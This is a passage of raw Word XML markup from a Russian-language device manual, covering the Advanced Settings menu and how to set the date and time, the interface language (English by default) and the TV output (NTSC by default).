      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced Settings [Дополнительные параметры] </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">выберите параметр </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Language [Язык] </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, после чего на экране дисплея отобразится окно для выбора языка интерфейса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-- По умолчанию используется интерфейс на английском языке.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251675136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3037205</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>126365</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1458595" cy="1097280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="15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859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необходимый язык интерфейса,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Телевизионный</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>выход</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00233B41" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В окне </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced Settings [Дополнительные параметры] </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">выберите параметр </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">TV out [Телевизионный выход] </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, после чего на экране дисплея отобразится окно для настройки телевизионного выхода. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="4019"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-- По умолчанию используются телевизионные сигналы стандарта NTSC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1470660" cy="1104900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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0660" cy="1104900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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необходимое значение  параметра,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w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>изменений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C86290" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C86290">
        <w:t>Переход в окно дополнительных</w:t>
      </w:r>
      <w:r w:rsidRPr="00C86290">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C86290">
        <w:t>параметров</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Выберите </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Advanced</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Settings</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Дополнительные параметры] </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">в окне </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Setup</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Настройка]</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, а затем нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, чтобы перейти в окно настройки дополнительных параметров: </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Time</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Дата и время]</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Language</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Язык] </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>TV</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Выход телевизора]</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Путем нажатия кнопки </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">возврата </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>можно в любое время вернуться обратно в окно основных параметров. Повторное нажатие кнопки возврата позволит перейти обратно к рабочему экрану.</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9232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3066415</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>127000</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1426210" cy="1065530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1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621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Дата и</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>время</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Date</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Time</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Дата и время]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даты и времени. </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Используя кнопки со стрелками </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">влево/вправо </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">перейдите в необходимое поле, после чего используйте кнопки со стрелками </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>вверх/вниз</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, чтобы увеличить или уменьшить значение выбранного поля. После завершения настройки нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, чтобы сохранить конфигурацию и закрыть окно, или нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>возврата</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, чтобы завершить настройку без сохранения изменений.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Выбор языка</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>интерфейса</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В окне </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced Settings [Дополнительные параметры] </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">выберите параметр </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Language [Язык] </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, после чего на экране дисплея отобразится окно для выбора языка интерфейса. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-- По умолчанию используется интерфейс на английском языке.</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lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251680256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3037205</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>126365</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1458595" cy="1097280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="15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859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необходимый язык интерфейса,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Телевизионный</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>выход</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00233B41" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В окне </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced Settings [Дополнительные параметры] </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">выберите параметр </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">TV out [Телевизионный выход] </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, после чего на экране дисплея отобразится окно для настройки телевизионного выхода. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-- По умолчанию используются телевизионные сигналы стандарта NTSC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1470660" cy="1104900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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0660" cy="1104900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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необходимое значение  параметра,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w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
